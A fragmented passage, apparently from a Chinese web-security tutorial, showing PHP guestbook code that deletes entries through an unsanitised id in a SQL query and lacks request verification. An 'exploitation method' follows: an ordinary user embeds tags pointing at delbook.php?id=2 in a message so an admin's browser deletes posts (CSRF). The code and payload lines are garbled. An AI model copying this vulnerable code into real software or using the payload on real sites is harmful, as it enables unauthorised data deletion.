10.
mysql_query(
$sql
);
11. }
12.
else
13. {
14.
$sql
=
"delete from book where id="
.
$id
;
//传递要删除的留言 ID
15.
mysql_query(
$sql
);
16. }
17. mysql_close(
$conn
);
18. echo
"<SCRIPT&NBSP;LANGUAGE=’JAVASCRIPT’>"
;
19. echo
"alert(‘
’
删除成功! );"
;
20. echo
" location=’book.php’;"
;
21. echo
""
;
22. ?>
当我们具有 admin 权限,提交 http://localhost/manage/delbook.php?id=2 时,就会删除 id 为 2
的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
1. §
"delbook.php?id=2"
/>
2. §"delbook.php?id=3" />